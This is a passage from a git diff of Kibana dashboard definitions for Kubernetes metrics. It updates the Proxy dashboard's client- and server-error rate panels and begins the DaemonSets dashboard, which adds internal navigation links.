"kubernetes.proxy.host" + }, + "fea759f8-df7f-4c51-8163-03ed7c9e1a8f": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Client errors", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "fea759f8-df7f-4c51-8163-03ed7c9e1a8f" - ], - "layerId": "acbb7181-0ff2-4164-9761-8b2c430d6a68", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "eb84dd5b-79c5-4928-8636-fcc56d70b7fc", - "xAccessor": "a42b9c5d-612b-4849-be9e-2405c3ad6e28" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "formula": "counter_rate(last_value(kubernetes.proxy.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX1" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Part of Client errors", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.count" + }, + "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Part of Client errors", + "operationType": "counter_rate", + "references": [ + "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX0" + ], + "scale": "ratio", + "timeScale": "s" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "947a681d-0eb3-462e-a2cb-5adade5d6c85", + "key": "query", + "negate": false, + "type": "custom" + }, + "query": { + "range": { + "kubernetes.proxy.code": { + "gte": 400, + "lt": 500 + } + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "24a2f3ce-a762-4e5f-8794-ff67fc70a41d", - "w": 24, - "x": 0, - "y": 66 + "layers": [ + { + "accessors": [ + "fea759f8-df7f-4c51-8163-03ed7c9e1a8f" + ], + "layerId": "acbb7181-0ff2-4164-9761-8b2c430d6a68", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "eb84dd5b-79c5-4928-8636-fcc56d70b7fc", + "xAccessor": "a42b9c5d-612b-4849-be9e-2405c3ad6e28" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "24a2f3ce-a762-4e5f-8794-ff67fc70a41d", - "title": "Client error responses counter rate", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-54af7a75-9eab-4746-b959-378d6bbb7cf6", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "54af7a75-9eab-4746-b959-378d6bbb7cf6": { - "columnOrder": [ - "e05814a2-da30-432b-8fbf-bad34214cc4c", - "2a39c430-b798-486a-8ad6-f91c4fb96fc8", - "ffd0dce8-3168-40cd-9ec3-46d5003d9093", - "e137ff3f-86e1-4be8-9bee-a9f50d5cbec8", - "63166add-64d0-4f67-b9cf-e0a4fee229a4", - "f19c32fc-8086-4c14-a124-747572608ae5", - "b842fba2-3cc2-4d13-8cf9-37b66f21b796", - "ffd0dce8-3168-40cd-9ec3-46d5003d9093X1", - "ffd0dce8-3168-40cd-9ec3-46d5003d9093X0" - ], - "columns": { - "2a39c430-b798-486a-8ad6-f91c4fb96fc8": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "63166add-64d0-4f67-b9cf-e0a4fee229a4": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "", - "operationType": "differences", - "references": [ - "e137ff3f-86e1-4be8-9bee-a9f50d5cbec8" - ], - "scale": "ratio" - }, - "b842fba2-3cc2-4d13-8cf9-37b66f21b796": { - "customLabel": true, - "dataType": "number", - "filter": {}, - "isBucketed": false, - "label": "", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.count" - }, - "e05814a2-da30-432b-8fbf-bad34214cc4c": { - "dataType": "string", - "isBucketed": true, - "label": "Top values", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.proxy.code", - "kubernetes.proxy.method" - ], - "size": 4 - }, - "scale": "ordinal", - "sourceField": "kubernetes.proxy.host" - }, - "e137ff3f-86e1-4be8-9bee-a9f50d5cbec8": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.count" - }, - "f19c32fc-8086-4c14-a124-747572608ae5": { - "customLabel": true, - "dataType": "number", - "filter": {}, - "isBucketed": false, - "label": "", - "operationType": "differences", - "references": [ - "b842fba2-3cc2-4d13-8cf9-37b66f21b796" - ], - "scale": "ratio" - }, - "ffd0dce8-3168-40cd-9ec3-46d5003d9093": { - "customLabel": true, - "dataType": "number", - "filter": {}, - "isBucketed": false, - "label": "Server errors", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 2 - } - }, - "formula": "counter_rate(last_value(kubernetes.proxy.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "ffd0dce8-3168-40cd-9ec3-46d5003d9093X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "ffd0dce8-3168-40cd-9ec3-46d5003d9093X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.client.request.count: *" - }, - "isBucketed": false, - "label": "Part of Server errors", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.count" - }, - "ffd0dce8-3168-40cd-9ec3-46d5003d9093X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Server errors", - "operationType": "counter_rate", - "references": [ - "ffd0dce8-3168-40cd-9ec3-46d5003d9093X0" - ], - "scale": "ratio", - "timeScale": "s" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Client error responses counter rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "e3c408a3-6515-4104-b764-888f39fa6185", + "w": 24, + "x": 24, + "y": 66 + }, + "panelIndex": "e3c408a3-6515-4104-b764-888f39fa6185", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-54af7a75-9eab-4746-b959-378d6bbb7cf6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "54af7a75-9eab-4746-b959-378d6bbb7cf6": { + "columnOrder": [ + "e05814a2-da30-432b-8fbf-bad34214cc4c", + "2a39c430-b798-486a-8ad6-f91c4fb96fc8", + "ffd0dce8-3168-40cd-9ec3-46d5003d9093", + "e137ff3f-86e1-4be8-9bee-a9f50d5cbec8", + "63166add-64d0-4f67-b9cf-e0a4fee229a4", + "f19c32fc-8086-4c14-a124-747572608ae5", + "b842fba2-3cc2-4d13-8cf9-37b66f21b796", + "ffd0dce8-3168-40cd-9ec3-46d5003d9093X1", + "ffd0dce8-3168-40cd-9ec3-46d5003d9093X0" + ], + "columns": { + "2a39c430-b798-486a-8ad6-f91c4fb96fc8": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "63166add-64d0-4f67-b9cf-e0a4fee229a4": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "", + "operationType": "differences", + "references": [ + "e137ff3f-86e1-4be8-9bee-a9f50d5cbec8" + ], + "scale": "ratio" + }, + "b842fba2-3cc2-4d13-8cf9-37b66f21b796": { + "customLabel": true, + "dataType": "number", + "filter": {}, + "isBucketed": false, + "label": "", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.count" + }, + "e05814a2-da30-432b-8fbf-bad34214cc4c": { + "dataType": "string", + "isBucketed": true, + "label": "Top values", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "f97a243b-a7a5-4fff-b2c8-7e4231e73f63", - "key": "query", - "negate": false, - "type": "custom" - }, - "query": { - "range": { - "kubernetes.proxy.code": { - "gte": 500 - } - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "kubernetes.proxy.code", + "kubernetes.proxy.method" ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 4 + }, + "scale": "ordinal", + "sourceField": "kubernetes.proxy.host" + }, + "e137ff3f-86e1-4be8-9bee-a9f50d5cbec8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.count" + }, + "f19c32fc-8086-4c14-a124-747572608ae5": { + "customLabel": true, + "dataType": "number", + "filter": {}, + "isBucketed": false, + "label": "", + "operationType": "differences", + "references": [ + "b842fba2-3cc2-4d13-8cf9-37b66f21b796" + ], + "scale": "ratio" + }, + "ffd0dce8-3168-40cd-9ec3-46d5003d9093": { + "customLabel": true, + "dataType": "number", + "filter": {}, + "isBucketed": false, + "label": "Server errors", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "ffd0dce8-3168-40cd-9ec3-46d5003d9093" - ], - "layerId": "54af7a75-9eab-4746-b959-378d6bbb7cf6", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "e05814a2-da30-432b-8fbf-bad34214cc4c", - "xAccessor": "2a39c430-b798-486a-8ad6-f91c4fb96fc8" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "formula": "counter_rate(last_value(kubernetes.proxy.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "ffd0dce8-3168-40cd-9ec3-46d5003d9093X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "ffd0dce8-3168-40cd-9ec3-46d5003d9093X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.client.request.count: *" + }, + "isBucketed": false, + "label": "Part of Server errors", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.count" + }, + "ffd0dce8-3168-40cd-9ec3-46d5003d9093X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Server errors", + "operationType": "counter_rate", + "references": [ + "ffd0dce8-3168-40cd-9ec3-46d5003d9093X0" + ], + "scale": "ratio", + "timeScale": "s" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "f97a243b-a7a5-4fff-b2c8-7e4231e73f63", + "key": "query", + "negate": false, + "type": "custom" + }, + "query": { + "range": { + "kubernetes.proxy.code": { + "gte": 500 + } + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "e3c408a3-6515-4104-b764-888f39fa6185", - "w": 24, - "x": 24, - "y": 66 + "layers": [ + { + "accessors": [ + "ffd0dce8-3168-40cd-9ec3-46d5003d9093" + ], + "layerId": "54af7a75-9eab-4746-b959-378d6bbb7cf6", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "e05814a2-da30-432b-8fbf-bad34214cc4c", + "xAccessor": "2a39c430-b798-486a-8ad6-f91c4fb96fc8" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "e3c408a3-6515-4104-b764-888f39fa6185", - "title": "Server error responses counter rate", - "type": "lens", - "version": "8.6.0" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Proxy", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-01-11T16:15:13.706Z", - "id": "kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd:metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f74e1a86-4370-4f65-a3b8-d92c9f25ff42:indexpattern-datasource-layer-5de1942f-e0a5-4ed8-86c0-972d57d62085", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "34de2f11-faf2-49e8-aada-98c2cd5eb266:indexpattern-datasource-layer-0b5eadf5-2a9c-49a2-b862-d317822adfd8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c3fee68f-01c6-49da-a759-2900b1cd15bf:metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "af47c34c-961a-463c-9d66-ffedcc2eef12:indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "af47c34c-961a-463c-9d66-ffedcc2eef12:169f9d33-cf55-422e-906e-f4eecb26a362", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "303702e1-ba33-49f2-b337-4cc7d7305606:indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1604f0de-edd6-456e-8670-ab9b33988abb:indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f8313a9d-ab58-448e-b183-75f914caf53f:metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1bd24fa1-319e-4cae-9d45-d821b06a8034:indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "24a2f3ce-a762-4e5f-8794-ff67fc70a41d:indexpattern-datasource-layer-acbb7181-0ff2-4164-9761-8b2c430d6a68", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e3c408a3-6515-4104-b764-888f39fa6185:indexpattern-datasource-layer-54af7a75-9eab-4746-b959-378d6bbb7cf6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_f53d0d21-4502-4dce-8004-017a92104040:optionsListDataView", - "type": "index-pattern" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_df56c430-83b1-436e-8b9c-fb027aaa29ca:optionsListDataView", - "type": "index-pattern" - } + "title": "Server error responses counter rate" + } ], - "type": "dashboard", - "updated_at": "2023-01-11T16:15:13.706Z", - "version": "WzM1MDAsMV0=" + "timeRestore": false, + "title": "[Metrics Kubernetes] Proxy", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd:metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f74e1a86-4370-4f65-a3b8-d92c9f25ff42:indexpattern-datasource-layer-5de1942f-e0a5-4ed8-86c0-972d57d62085", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "34de2f11-faf2-49e8-aada-98c2cd5eb266:indexpattern-datasource-layer-0b5eadf5-2a9c-49a2-b862-d317822adfd8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c3fee68f-01c6-49da-a759-2900b1cd15bf:metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "af47c34c-961a-463c-9d66-ffedcc2eef12:indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "af47c34c-961a-463c-9d66-ffedcc2eef12:169f9d33-cf55-422e-906e-f4eecb26a362", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "303702e1-ba33-49f2-b337-4cc7d7305606:indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1604f0de-edd6-456e-8670-ab9b33988abb:indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f8313a9d-ab58-448e-b183-75f914caf53f:metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1bd24fa1-319e-4cae-9d45-d821b06a8034:indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "24a2f3ce-a762-4e5f-8794-ff67fc70a41d:indexpattern-datasource-layer-acbb7181-0ff2-4164-9761-8b2c430d6a68", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e3c408a3-6515-4104-b764-888f39fa6185:indexpattern-datasource-layer-54af7a75-9eab-4746-b959-378d6bbb7cf6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_f53d0d21-4502-4dce-8004-017a92104040:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_df56c430-83b1-436e-8b9c-fb027aaa29ca:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013.json index d066b5bf8c1..fa81a82e6bb 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013.json @@ -1,904 +1,912 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"0e42fece-4a2f-4b80-a57d-89eeec3d0d29\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"0e42fece-4a2f-4b80-a57d-89eeec3d0d29\",\"enhancements\":{}}},\"cfe75517-e74e-43eb-9566-258234ad92e7\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"cfe75517-e74e-43eb-9566-258234ad92e7\",\"selectedOptions\":[],\"enhancements\":{}}},\"274480d2-d432-486c-bce5-e88caa3d6b7a\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.daemonset.name\",\"title\":\"DaemonSet Name\",\"id\":\"274480d2-d432-486c-bce5-e88caa3d6b7a\",\"selectedOptions\":[],\"enhancements\":{}}}}" - }, - "description": "Metrics about DaemonSets", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "id": "kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI0OSwyXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "twoLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"0e42fece-4a2f-4b80-a57d-89eeec3d0d29\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"0e42fece-4a2f-4b80-a57d-89eeec3d0d29\",\"enhancements\":{}}},\"cfe75517-e74e-43eb-9566-258234ad92e7\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"cfe75517-e74e-43eb-9566-258234ad92e7\",\"selectedOptions\":[],\"enhancements\":{}}},\"274480d2-d432-486c-bce5-e88caa3d6b7a\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.daemonset.name\",\"title\":\"DaemonSet Name\",\"id\":\"274480d2-d432-486c-bce5-e88caa3d6b7a\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Metrics about DaemonSets", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "gridData": { + "h": 4, + "i": "573ec41e-ffc3-4c89-ba35-138bab599f07", + "w": 48, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false - }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "573ec41e-ffc3-4c89-ba35-138bab599f07", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "573ec41e-ffc3-4c89-ba35-138bab599f07", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.10.2" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-e3bc5ca2-71af-4901-ae1c-82e383f83ae9", - "type": "index-pattern" + "panelIndex": "573ec41e-ffc3-4c89-ba35-138bab599f07", + "title": "Kubernetes Dashboards [Metrics Kubernetes]", + "type": "visualization", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-e3bc5ca2-71af-4901-ae1c-82e383f83ae9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d115572d-c1ae-4402-bd61-7f6aca621b17", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e3bc5ca2-71af-4901-ae1c-82e383f83ae9": { + "columnOrder": [ + "859d3534-c923-4005-a84a-158f079f7e62", + "e115f6a2-0a07-4712-ab16-e6bce3f17b2c" + ], + "columns": { + "859d3534-c923-4005-a84a-158f079f7e62": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of 